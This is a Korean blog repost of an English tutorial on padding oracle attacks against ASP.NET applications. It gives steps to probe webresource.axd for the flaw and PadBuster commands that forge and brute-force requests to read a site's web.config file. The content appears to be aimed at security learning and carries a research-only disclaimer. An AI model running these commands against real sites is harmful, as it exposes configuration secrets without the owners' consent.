Padding oracle attack explained

In cryptography, the padding oracle attack is an attack on the CBC mode of operation, where the server leaks data about whether the padding of an encrypted message is correct or not. oracle refers to a mechanism in cryptography that can be used to determine whether a test has passed or failed. This information would help an attacker to decrypt and encrypt data without key.

How to find your .NET application is vulnerable to padding oracle attack or not?

    1. Using burp proxy capture a request to webresource.axd file
      Ex: http://somesite.com/webresource.axd?d=qmZbysenet6VGS94Ord8gQ2
    2. Change one character in the d value and send the request to the server. Observe the response.
    3. Send request to a non existent aspx page on the server. Observe the response.
      Ex: http://somesite.com/nonexist.aspx
    4. Response 2 and response 3 are differ, then it is possible to exploit the attack.

My OWASP presentation on 20-Aug-2011:

padbuster tool can be used to automate the padding oracle attack. This tool is a free ware and you can download it from – https://github.com/GDSSecurity/PadBuster/blob/master/padBuster.pl

* Perl is required to run padbuster. Perl can be downloaded from
http://strawberry-perl.googlecode.com/files/strawberry-perl-5.12.3.0.msi

Padbuster usage to attack .NET applications

  1. Encrypt web.config file –
    padBuster.pl http://somesite.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2
    AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config
  2. Brute force the first block-
    padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAA
    AAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce –log
  3. Observe the log, at some point you will get 200 ok message, grab that URL and paste it in browser. It displays the web.config content.

Watch this video to get a better understanding of the attack:




[출처]
http://securitylearn.wordpress.com/2011/08/19/padding-oracle-attack-explained/



[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 뚱띵이_SQL' 카테고리의 다른 글

My-SQL을 이용한 Webshell 만들기  (0) 2012.02.28
Padding oracle attack explained  (0) 2011.10.19
SQL Injection Cheat Sheet  (0) 2011.10.13
Aqua Fold - Aqua Data Studio  (0) 2011.08.09
Posted by 작은여우 bitfox